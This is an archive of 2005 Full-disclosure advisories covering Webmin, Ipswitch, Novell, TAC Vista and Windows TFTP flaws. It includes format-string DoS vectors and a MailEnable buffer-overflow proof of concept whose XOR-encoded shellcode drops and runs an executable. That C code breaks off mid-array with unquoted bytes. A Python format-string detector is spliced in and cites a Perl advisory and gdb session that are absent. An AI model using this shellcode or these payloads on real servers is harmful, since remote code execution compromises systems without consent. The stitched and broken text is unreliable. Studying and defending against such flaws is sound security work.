[Full-disclosure] Webmin miniserv.pl format string vulnerability

2005-11-29 Thread advisory
SUMMARY.  The webmin `miniserv.pl' web server component is vulnerable to
a new class of exploitable (remote code) perl format string
vulnerabilities. During the login process it is possible to trigger this
vulnerability via a crafted username parameter containing format string
data. In the observed configuration the process was running as the user
root, so if remote code execution is successful, it would lead to a
full remote root compromise in a standard configuration. A valid login
is not required to trigger this vulnerability, only access to the
miniserv.pl port (default 10000).

Date Found: September 23, 2005.
Public Release: November 29, 2005.
Application:webmin miniserv.pl, all known versions
Credit: Jack Louis of Dyad Security

BACKGROUND.  miniserv.pl is a part of the webmin system administration
front end, written in perl by Jamie Cameron. more details are available
at http://www.webmin.com.

DESCRIPTION.  The username parameter of the login form is logged via the
perl `syslog' facility in an unsafe manner during an unknown-user login
attempt. The perl syslog facility passes the username on to the variable
argument function sprintf, which will treat any format specifiers and
process them accordingly.

DETAILS.  The vectors for a simple DoS of the web server are to use the
%n and %0(large number)d inside of the username parameter, with the
former causing a write protection fault within perl leading to script
abortion, and the latter causing a large amount of memory to be
allocated inside of the perl process.

A generic remote code execution exploit method has been developed by a
third party that is reachable though this hole itself.

The following is the section of code in question. (from miniserv.pl)

if ($use_syslog && !$validated) {
        syslog("crit",
               ($nonexist ? "Non-existent" :
                $expired ? "Expired" : "Invalid").
               " login as $authuser from $acpthost");
        }

As can be clearly seen with this section of code, the user supplied data
is clearly within the format specification of the syslog call.

Additional information and sample work around patches can be found at
http://www.dyadsecurity.com/webmin-0001.html

LEGAL NOTICES.  
Copyright (C) 2005 Dyad Security, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of Dyad Security, Inc. If you wish to reprint the whole
or any part of this alert in any other medium other than electronically,
please email [EMAIL PROTECTED] for permission.

DISCLAIMER.  The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
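As an added example serving both the perl advisory above and this webmin advisory (our code, not Dyad Security's and not part of perl or webmin), detection logic that a login handler or log pipeline can run over the raw username value before it reaches any format function: it picks out printf-style directives, flags the %n and %0(large number)d vectors named above, and reproduces the I32 wrap that the gdb session shows for an explicit index above INT_MAX (2147483648 becomes -2147483648). The sample usernames are constructed; function names and the 4096 width threshold are our choices. The code fix on the webmin side is the usual one: pass the message as an argument rather than as the format, e.g. syslog("crit", "%s", $msg).

```python
import re
from typing import Dict, List

INT32_MAX = 2**31 - 1


def to_i32(n: int) -> int:
    """Value an unsigned count n takes when stored in a 32-bit signed variable
    (Perl's I32 'efix' in sv.c): 2147483648 wraps to -2147483648, as in the gdb session."""
    n &= 0xFFFFFFFF
    return n - 2**32 if n & 0x80000000 else n


# printf-style directive: %[index$][flags][width][.precision]conversion
DIRECTIVE = re.compile(r"%(?:(\d+)\$)?([-+ 0#]*)(\d+)?(?:\.(\d+))?([a-zA-Z%])")


def analyze_format_directives(text: str, max_width: int = 4096) -> List[Dict]:
    """Return the directives in text that match the vectors named in the two advisories."""
    findings = []
    for m in DIRECTIVE.finditer(text):
        index, _flags, width, precision, conv = m.groups()
        if conv == "%":
            continue                                   # "%%" is a literal percent sign
        reasons = []
        if conv == "n":
            reasons.append("%n writes a byte count to memory")
        if index is not None and int(index) > INT32_MAX:
            reasons.append(f"explicit index {index} wraps to {to_i32(int(index))} as I32")
        if width and int(width) > max_width:
            reasons.append(f"field width {width} forces a large allocation")
        if precision and int(precision) > max_width:
            reasons.append(f"precision {precision} forces a large allocation")
        if reasons:
            findings.append({"directive": m.group(0), "reasons": reasons})
    return findings


def scan_login_usernames(usernames: List[str]) -> Dict[str, List[Dict]]:
    """Map each suspicious username to its findings; clean names are omitted."""
    result = {}
    for name in usernames:
        findings = analyze_format_directives(name)
        if findings:
            result[name] = findings
    return result


# Constructed username values from login attempts (not taken from either advisory).
SAMPLE_USERNAMES = ["alice", "bob.smith", "50%off", "%2147483648$n", "%0999999999d", "%5$n"]


if __name__ == "__main__":
    for name, findings in scan_login_usernames(SAMPLE_USERNAMES).items():
        for f in findings:
            print(f"{name!r}: {f['directive']} -> {'; '.join(f['reasons'])}")
```

A name such as "50%off" is reported clean because "%o" with no width, index or %n matches none of the named vectors; tighten the rules if your environment never sees a percent sign in usernames at all.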


[Full-disclosure] [CIRT.DK] Ipswitch Whatsup small Business 2004 - Directory Traversal

2005-11-02 Thread CIRT.DK Advisory
Title: [CIRT.DK] Ipswitch Whatsup small Business 2004 - Directory Traversal

Vendor: IpSwitch

Product: Ipswitch Whatsup small Business 2004

Description:

The Whatsup Small Business 2004 is vulnerable to a directory traversal attack using ../

Read the full advisory at http://www.cirt.dk

CIRT.DK




[Full-disclosure] [CIRT.DK] - Novell ZENworks Patch Management Server 6.0.0.52 - SQL injection

2005-10-27 Thread CIRT.DK Advisory
The Novell ZENworks Patch Management Server 6.0.0.52 is vulnerable to
SQL injection in the management console.

To be able to exploit this issue, the administrator has to have manually
created at least a non-privileged account.

Fix:
Upgrade to ZENworks Patch Management version 6.2.2.181
(or newer hot fix via your PLUS server) found at http://download.novell.com.

Note:
The 6.0.0.52 CD ISO image was on the Novell download site up until the 2nd
week of September, 2005.
The ZENworks Patch Management CD ISO image that is currently available at
the download site at the time of this document being published:
http://download.novell.com/Download?buildid=5_kRStyf9wU~

ISO Name: ZEN_PatchMgmt_Upd6.2.iso  Size: 323.8 MB (339607552)
MD5: aeb244ecdf29c83cb8388fae1a6a1919


A technical description of the vulnerability can be read at: 
http://www.cirt.dk





[Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread advisory
Attached is a proof of concept for the MailEnable W3C Logging
vulnerability. It features a special type of patching shellcode designed
to quickly and easily secure this vulnerability across your network.

I am releasing this in hopes that other POC writers will follow suit,
releasing exploits that patch the vulnerability rather than exploit it for
a malicious purpose. The reason this is being done is to support the admin
rather than to support the hacker.

/*
MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

This is a pretty standard stack overflow with a SE handler overwrite.
The buffer used provides quite a bit of room for shellcode, so I've decided
to construct a shellcode that as far as I know hasn't been made. The 
shellcode provided will transport a 1008 byte win32 PE executable file. The 
shellcode
will then save it to disk, run the executable, and close the server. The 
executable will serve as a small patching tool, which will download the
patch provided by mailenable.com,unzip it, restart the service, and copy 
the patched exe. This shellcode will eliminate the very hole it used to gain
access. The old server executable will not be deleted, merely renamed to 
_MEIMAPS.exe. 

For those paranoid individuals who cannot read C code, YOUR-Address can be
anything as long as the length is the same as the real IP. If your IP is 
192.168.0.1, then 111.222.3.4 will work fine. We're only using it to 
calculate the length of the buffer for stack alignment. As you can see,
there is no call home code here :)

If you have any questions about this exploit, or how you may use it on 
your network to quickly patch your Mail Enable installations, please feel free 
to e-mail us
at [EMAIL PROTECTED]
*/

#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")

long gimmeip(char *hostname);
void makeSpaceTaker(char *buff, int len);
char buffer[7300];
//Simple XOR'd 2-stage shellcode
//Some parts of this shellcode were taken from vlad902's toolset.
//Saves omg.exe to disk and runs.
char patchshell[]=
\xEB\x17\x31\xC0\x66\xB8\x02\x05\x8B\x34
\x24\x66\x81\x36\x1E\x17\x83\xC6\x02\x83
\xE8\x02\x75\xF3\xC3\xE8\xE4\xFF\xFF\xFF
\xE2\xFF\xFB\x17\x1E\x17\x48\x9C\x5B\x2B
\x95\x6B\x1B\x6F\x1F\xF8\x95\x58\x06\x9C
\x41\x37\x1F\xFC\xFD\x39\x57\x9C\x2A\x9C
\x1F\xF9\x2F\xD7\x87\xBB\x9A\xD7\x6A\x10
\xDF\xDD\x13\x16\xDC\xFC\xEA\x2C\x4A\x33
\x16\x62\xFD\x9C\x41\x33\x1F\xFC\x78\x9C
\x12\x5C\x95\x48\x02\x16\xF5\x9C\x02\x9C
\x1F\xFC\x40\xD4\x76\x61\x73\xA7\x5B\xE8
\xC8\x43\x41\x41\x76\x17\x1F\x17\x1E\x40
\x76\x17\x1E\x17\x1E\xE8\xCD\x49\x1F\xF7
\x56\x97\x26\x4B\x6B\xED\xD8\x17\x1E\x7F
\x51\x14\xD9\xA8\xE1\xC1\x44\x43\xE1\xC4
\x76\xB2\x09\x17\x62\xE8\xC8\x7F\x7B\x6F
\x7B\x17\x76\x78\x73\x70\x30\x9E\xFF\x41
\x74\x17\x74\x17\x74\x13\x74\x17\x74\x17
\x74\x15\x4F\xE8\xCD\x49\x4E\x7F\x01\x6E
\x14\xFF\xE1\xC1\x46\x4F\x48\x47\x74\x17
\xF5\x4B\x44\x45\x76\xE7\x1D\x17\x1E\x96
\xDC\x13\x1E\x17\x1E\x45\x4E\xE8\xCD\x7F
\xE5\x80\xE3\x18\xE1\xC1\x46\x4F\x48\x47
\xE1\xC4\x40\x7F\x60\xCF\xFC\x64\xE1\xC1
\x97\x0B\x3A\x7F\x86\xE9\x94\x19\xE1\xC1
\x47\x9E\xFF\x96\xDF\x1F\x1E\x17\x1E\x7D
\x1E\x46\xE1\xC4\xDD\x26\xE8\x73\x95\x61
\x06\xBA\xB3\x9C\x76\xF3\x53\x71\x2F\xFA
\x78\x96\x63\x17\x53\x4D\x6B\xE3\x40\xFE
\x5C\xE8\xE1\xE8\xF6\x88\xE1\xE8\xE1\x56
\x5C\x54\x5A\x5A\x44\x87\x1E\x14\x1E\x17
\x1E\x13\x1E\x17\x1E\xE8\xE1\x17\x1E\xAF
\x1E\x17\x1E\x17\x1E\x17\x1E\x57\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x97\x1E\x17\x1E\x19\x01\xAD
\x10\x17\xAA\x1E\xD3\x36\xA6\x16\x52\xDA
\x3F\x43\x76\x7E\x6D\x37\x6E\x65\x71\x70
\x6C\x76\x73\x37\x7D\x76\x70\x79\x71\x63
\x3E\x75\x7B\x37\x6C\x62\x70\x37\x77\x79
\x3E\x53\x51\x44\x3E\x7A\x71\x73\x7B\x39
\x13\x1A\x14\x33\x1E\x17\x1E\x17\x1E\x17
\x1E\x47\x5B\x17\x1E\x5B\x1F\x16\x1E\xCF
\x35\x2D\x5D\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\xF7\x1E\x18\x1F\x1C\x1F\x15\x2C\x47
\x1C\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x57\x1C\x17\x1E\xB7\x1F\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x57\x1E\x07\x1E\x17
\x1E\x07\x1E\x17\x1E\x13\x1E\x17\x1E\x17
\x1E\x17\x1E\x13\x1E\x17\x1E\x17\x1E\x17
\x1E\xE7\x1D\x17\x1E\xB7\x1F\x17\x1E\x17
\x1E\x17\x1E\x14\x1E\x17\x1E\x17\x1E\x07
\x1E\x17\x0E\x17\x1E\x17\x1E\x07\x1E\x17
\x0E\x17\x1E\x17\x1E\x17\x1E\x07\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x0F
\x1D\x17\x1E\x3F\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x77\x1D\x17
\x1E\x37\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x39
\x6A\x72\x66\x63\x1E\x17\x1E\x5F\x1C\x17
\x1E\xB7\x1F\x17\x1E\x47\x1C\x17\x1E\xB7
\x1F\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17

Re: [Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread advisory
“We will patch you even if you want it or not ? :D”
First and foremost, this POC was designed for use by network administrators
on their own network. We never intended this to be converted into a bot
and spread. I can’t see how a bot that systematically disables its
victims would spread that well anyway. We are attempting to facilitate
the previously tedious job of patching multiple machines on a given
network. Only those with malicious intent should find annoyance in this
advisory.




[Full-disclosure] [CIRT.DK - Advisory] Windows XP SP2 Local TFTP HEAP based Overflow

2005-10-03 Thread CIRT.DK Advisory
[Description]
The Windows XP tftp.exe software is vulnerable to a local heap-based
overflow, allowing arbitrary commands to be run on the system as the user
issuing the overflow.

[Complete advisory]
CIRT.DK Advisory 38 can be read at http://www.cirt.dk/

Regards
CIRT.DK



[Full-disclosure] [CIRT.DK - Advisory 37] TAC Vista Webstation 3.0 Directory Traversal bug in webinterface

2005-09-16 Thread CIRT.DK Advisory

TAC Vista is based on open technologies; it is one of the most advanced
software solutions for building automation. TAC Vista efficiently and
economically controls, checks and analyzes all building operations, allowing
system operators to control and monitor entire systems on site or from
remote locations.

The Web application is running on a Microsoft IIS 5.0 Server in this case. 

The problem is occurring in the input field of where the Template is called,
resulting in the possibility to traverse into other parts of the system.

Read the full Advisory at http://www.cirt.dk



[Full-disclosure] 3 minor vulnerabilities in IPSwitch products

2005-09-09 Thread CIRT.DK Advisory
The following 3 minor vulnerabilities were found in the products Whatsup
Gold 8.04 and WhatsUp Small Business 2004

Ipswitch Whatsup Gold 8.04 - Access to view source code of all
files(CIRT-34-advisory)
Ipswitch Whatsup Gold 8.04 - Cross Site Scripting (CIRT-35-advisory)
Ipswitch Whatsup small Business 2004 - Source code disclosure
(CIRT-36-advisory)

Read the full advisories at http://www.cirt.dk






[Full-disclosure] [CIRT.DK - Advisory] Novell iManager 2.0.2 ASN.1 Parsing vulnerability in Apache module

2005-06-12 Thread CIRT.DK Advisory
ID: NOVL102200 
Domain: primus 
Solution Class: Novell 
Fact: Novell iManager 2.02 
Fact: Apache 2.0.48 
Fact: OpenSSL 0.9.7 
Symptom: OpenSSL ASN.1 Parsing vulnerability in Apache 
Symptom: Server stops responding and an error occurs 
Cause: Multiple vulnerabilities were reported in the ASN.1 parsing code in
OpenSSL. 
These issues could be exploited to cause a denial of service or to execute
arbitrary code. 

Fix: These vulnerabilities are corrected in OpenSSL 0.9.7d.
iManager 2.5 ships with OpenSSL 0.9.7d; to resolve the vulnerability,
upgrading is suggested.

Read the full advisory at http://www.cirt.dk

